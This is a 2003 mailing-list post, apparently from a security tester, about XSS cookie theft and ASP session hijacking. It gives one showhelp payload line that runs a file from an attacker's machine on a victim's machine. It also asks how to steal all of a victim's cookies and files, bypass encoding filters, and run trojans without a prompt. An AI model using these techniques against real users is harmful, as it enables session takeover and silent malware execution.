Hey Everybody,
First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah for
their guidance to test XSS and Session ID brute force attack.
Now I can transfer victim’s cookie to another location successfully. I have
tested XSS to transfer cookie using following three ways:
1. Using document.location
2. Using Image src
3. Using hidden fields
The cookie, which I am getting, is of current application only. Now how can I
steal all cookies stored on the victim’s machine? or how to transfer a file
from Victim machine?.
Some sites converts < and > tags into < and > to protect them selves
from XSS attacks. Is there any way to bypass this protection?
I was testing some trojan execution using XSS. In this process I was able to
run help file 31users.chm from attackers machine to victims machine as
follows:
window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
Is it possible to run some trojan or activex componenet instead of help file?
Without alerting for any pop-up.
Is this possible to write some malicious help file? (These files not even ask
before execution.)
As per IDefence’s Article on “Brute forcing Session ID” some time session ID
is random. I have tested this against six sites and I was not much lucky to
get session IDs in which only last 3-4 digits are changing.
What do you think in practice still are they so? Since iDEFENSE has published
this research in Nov 2001 and current scenario might be a bit changed.
In my research of six sites, four sites were using ASP session variable to
generated session ID and remaining two their own.
I was able to hijack ASP sessions using session IDs. In my testing, first I
have logged in as user1, got his session ID and using user1’s session ID, I
was able to hijack user1.
Any help on this would be highly appreciated.
Thanking You.
Sincerely,
Indian Tiger, CISSP
Received on Apr 18 2003
Intro
